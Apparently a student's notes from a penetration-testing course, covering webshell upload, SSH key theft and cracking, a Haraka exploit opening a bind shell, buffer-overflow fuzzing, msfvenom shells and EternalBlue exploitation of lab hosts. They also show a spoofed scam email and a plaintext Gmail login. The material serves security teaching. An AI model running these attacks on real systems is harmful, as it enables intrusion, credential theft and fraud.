PC137425
07.01.2019
buffer overflow??
a characteristic of the C language
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",25))
s.recv(1024)
s.send("ehlo google.com\r\n")
s.recv(1024)
required:
win7 fresh install
immunity debugger
what we expect from this module,
to do:
simple exploit
advanced exploit
port an existing XP exploit to Win7 or Win10
=================
nmap 172.16.65.1 -p 80
nmap 172.16.65.0/24 -p 80 --open
found
172.16.65.132
download simple-backdoor.php
/usr/share/webshells/php# ls
cd Desktop
cat simple-backdoor.php
mv simple-backdoor.php tv.php
upload on 172.16.65.132
curl http://172.16.65.132/jQuery/server/php/files/tv.php\?cmd\=cat+/etc/passwd
gives us the list of users on that system
==========================
nano exploit_jquery.py
import requests
# Python 2, as used throughout these notes: interactive loop that passes each
# typed command to the uploaded webshell and prints the response body
while True:
    cmd = raw_input("> ")
    r = requests.get("http://172.16.65.132/jQuery/server/php/files/tv.php?cmd={}".format(cmd))
    print(r.text)
python exploit_jquery.py
==========================
cat /etc/passwd
ls /home/hot
##csf.zip found
ls -al /home/hot/csf.zip ##check permissions
ls -al /home/hot ##list files in that directory
ls -al /home/hot/.ssh/ ##backup file permission rwx
cat /home/hot/.ssh/backup ##private key found
copy the private key into a local file, id_rs.key
ssh -i id_rs.key hot@172.16.65.132 ##Load key "id_rs.key": bad permissions
chmod 600 id_rs.key
ssh -i id_rs.key hot@172.16.65.132 ## key is encrypted
##bruteforce required
##prepare rockyou.txt
##john to be used
/usr/sbin/ssh2john
ssh2john /root/Desktop/id_rs.key > /root/Desktop/hash_id
cat hash_id
john hash_id --wordlist=rockyou.txt
## passphrase found: "mustang1"
ssh hot@172.16.65.132
cp csf.zip /var/www/html
unzip csf.zip
cd csf
see the port-knocking procedure
found port 29, searchsploit haraka, /usr/share/exploitdb/exploits/linux/remote/41162.py
cp 41162.py /home/dardan/Desktop/41162.py
nano 41162.py
smtp port to be modified
python 41162.py -c "nc -lvp 995 -e /bin/bash" -t root@haraka.test -m 172.16.65.132
nc 172.16.65.132 995
id
python -c "import pty;pty.spawn('/bin/bash')"
=============================================================================================
=============================================================================================
09.01.2019
3 folders to be created:
apps
explicit-Dev
exploits
what is to be learned:
smash the stack (means doing a buffer overflow)
on the stack are stored the variables, the functions, ...
patterns ?? a repeating cycle of one event
offset ??
structure of an exploit (vul. assessment)??
run a service
scan the IP that runs that service
e.g. nmap 172.16.60.x -p10000
telnet 172.16.60.x 10000
hello ##send data, it returns a reply
on the service's screen you see the logs
the get/put functions
get #must declare how many bytes it accepts (1 byte = one character)
if you send it 13 bytes... that means we are causing an overflow
so the vuln. is in the put function
fuzzing #e.g. we send 10 bytes, then 10 again, then 10 again, until it crashes
Immunity Debugger shows in memory how many bytes are being sent
BufferOverflow/exploits
-----------------------------------------
nano exploit_1.py
import socket
import sys
# Python 2, as used throughout these notes: send "hello" to the service on
# port 10000 and print whatever it answers
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 10000))
s.send("hello\r\n")
data = s.recv(1024)
print(data)
s.close()
python exploit_1.py 172.16.60.x
--------------------------------------
EIP ? find how many A's are needed to reach it ...
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6a413969
ESP ? in Immunity Debugger: Ctrl+F, JMP ESP
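An added Python 3 example, not code from the course and not Metasploit's Ruby tools themselves: it re-implements what pattern_create.rb and pattern_offset.rb do, so the EIP-offset step above can be checked without the Ruby scripts (the query 6a413969 from these notes resolves to offset 268).

```python
import itertools
import string
import struct

# Longest run before the pattern repeats: 26 * 26 * 10 triplets of 3 chars.
MAX_UNIQUE = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the cyclic pattern 'Aa0Aa1Aa2...' cut to `length` characters.

    Same ordering as Metasploit: the digit cycles fastest, then the lowercase
    letter, then the uppercase letter, so every 4-byte window is unique
    within the first MAX_UNIQUE bytes.
    """
    triplets = ("".join(t) for t in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    buf = ""
    for t in itertools.cycle(triplets):  # wraps around past MAX_UNIQUE
        if len(buf) >= length:
            break
        buf += t
    return buf[:length]


def pattern_offset(query, length=MAX_UNIQUE):
    """Offset of `query` in the pattern, or -1 if it does not occur.

    `query` is either the overwritten bytes as text (e.g. 'i9Aj') or the
    8 hex digits the debugger shows in EIP (e.g. '6a413969'); the hex form
    is unpacked little-endian, which is what pattern_offset.rb does too.
    """
    q = query.lower()
    if q.startswith("0x"):
        q = q[2:]
    if len(q) == 8 and all(ch in string.hexdigits for ch in q):
        needle = struct.pack("<I", int(q, 16)).decode("latin-1")
    else:
        needle = query
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # EIP = 0x6a413969, the value queried in the notes above -> offset 268
    print(pattern_offset("6a413969"))
```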
nano exploit_2.py
demo in Immunity Debugger
generate patterns, fire the patterns at the target instead of e.g. AAA..
communicate with the application
crash the app
find how many bytes are needed to crash the app
me
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f c -b "\x00"
kernel32.dll
=============================================================================================
=============================================================================================
14.01.2019
Objectives
Target: 172.16.65.138
Objective:
on port 21, suspected to be vulnerable
the exploit for that service is for WinXP
now that service is running on Win7
the task is to modify it for Win7
Target: hack 172.16.65.138
stage2
add a vuln scanner to this PoC using the netaddr library, the network function
dardan@kali:~/Desktop/exploits/exploits$ python vull.py 172.16.60.75
Stage3
make it multithreaded
=============================================================================================
=============================================================================================
16.01.2019
fuzzing, identifying break points
identifying the limits (memory, disk)
To identify the break point
nano smtp.py
import socket
import sys
# Python 2, as used throughout these notes: connect, read the banner, close
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 25))
data = s.recv(1024)
s.close()
----------------------------------
import socket
import sys
# Python 2: send a "mail from:" argument of growing length until the server
# rejects it with a 553 reply; that length is the limit
for i in range(1, 1000):
    c = "A" * i
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 25))
    data = s.recv(1024)
    s.send("ehlo google.com\r\n")
    data = s.recv(1024)
    s.send("mail from:{}\r\n".format(c))
    data = s.recv(1024)
    s.close()
    if "553" in data:
        print("Limit is {}".format(i))
        break
python smtp.py 127.0.0.1
----------------------------
import socket
import sys
# Python 2: same loop, but the growing argument goes into "rcpt to:" after a
# valid "mail from:"; stop at the first "553 5.1.0" reply
for i in range(1, 1000):
    c = "A" * i
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 25))
    data = s.recv(1024)
    s.send("ehlo google.com\r\n")
    data = s.recv(1024)
    s.send("mail from:a\r\n")
    data = s.recv(1024)
    s.send("rcpt to:{}\r\n".format(c))
    data = s.recv(1024)
    s.close()
    if "553 5.1.0" in data:
        print("Limit is {}".format(i))
        break
python smtp.py 127.0.0.1
----------------------------
sudo apt-get install mailutils
sudo apt-get install sendmail
telnet 127.0.0.1 25
ehlo google.com
-----------------------------------------------
nmap 127.0.0.1 -p25
telnet 127.0.0.1 25
ehlo google.com
mail from:bill@microsoft.com
rcpt to:tima@for4mail.com
data
hello
from:bill@microsoft.com
hi
this bill gates, you won 1 m dollar.
Kind Regards
Bill
.
quit
-----------------------------------------------
google search: allow less security apps off to ON
google search: pop commands
openssl s_client -connect pop.gmail.com:995
USER habibihabib73@gmail.com
PASS cyber123456
=============================================================================================
18.01.2019
pycharm
create new project
create new file test.py
create new file mail_client.py
create new file server_manager.py
create new file email_manager.py
=============================================================================================
=============================================================================================
23.01.2019
...
sudo nasm -f bin eternalblue_kshellcode_x64.asm
ls
cat eternalblue_sc_merge.py
tool: tmux
nmap -p 445 172.16.60.94 --script smb-vuln-ms17-010
exploit -j -z
jobs -k 0
cd shellcode / remove
nano eternalblue_sc_merge.py / copy msfvenom
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=172.16.60.94 LPORT=xxxxx
set EXITFUNC thread
exploit -j -v
python eternalblue_exploit7.py 182.16.x.x shellcode/ ....
turn exploit7 into a library
scan the whole subnet for EternalBlue, exploit, payload
mkdir EB
nano main.py / just whether port 445 is open, app to scan an IP range
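For the netaddr-based scanner assignment (stage2 and stage3 of 14.01) and the port-445 range scan planned here, an added Python 3 example that is not the course's own code: it uses the standard-library ipaddress module instead of netaddr, probes every host of the range in its own thread, and takes the probe as a parameter so the logic can be exercised with a constructed stand-in and no network.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

SMB_PORT = 445


def tcp_probe(ip, port=SMB_PORT, timeout=1.0):
    """True if a TCP connect to ip:port succeeds within `timeout` seconds."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False


def scan_range(cidr, probe=tcp_probe, workers=32):
    """Return the hosts in `cidr` that accept TCP on 445, sorted by address.

    Network and broadcast addresses are skipped; each host is probed in a
    worker thread (the 'stage3' multithreading from the notes).
    """
    hosts = [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(probe, hosts))
    open_hosts = [h for h, is_open in zip(hosts, results) if is_open]
    return sorted(open_hosts, key=ipaddress.ip_address)


def fake_probe_factory(open_set):
    """Constructed stand-in for tcp_probe: 'open' iff the address is in open_set."""
    def probe(ip, port=SMB_PORT, timeout=1.0):
        return ip in open_set
    return probe


if __name__ == "__main__":
    import sys
    # usage: python scan445.py 172.16.60.0/24
    for host in scan_range(sys.argv[1]):
        print(host)
```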
=============================================================================================
=============================================================================================
26.01.2019
...
=============================================================================================
=============================================================================================
28.01.2019
bla bla
=============================================================================================
30.01.2019
did not attend
=============================================================================================
01.02.2019
did not attend
=============================================================================================
04.02.2019
pen test?
before pen test
- understanding OSes (not only Win and Linux)
services
- vector of attack
the attack method
red team - find vulns
blue team - fix vulns
purple testing - mixed
pen test... means capture the flag
white box
black box
grey box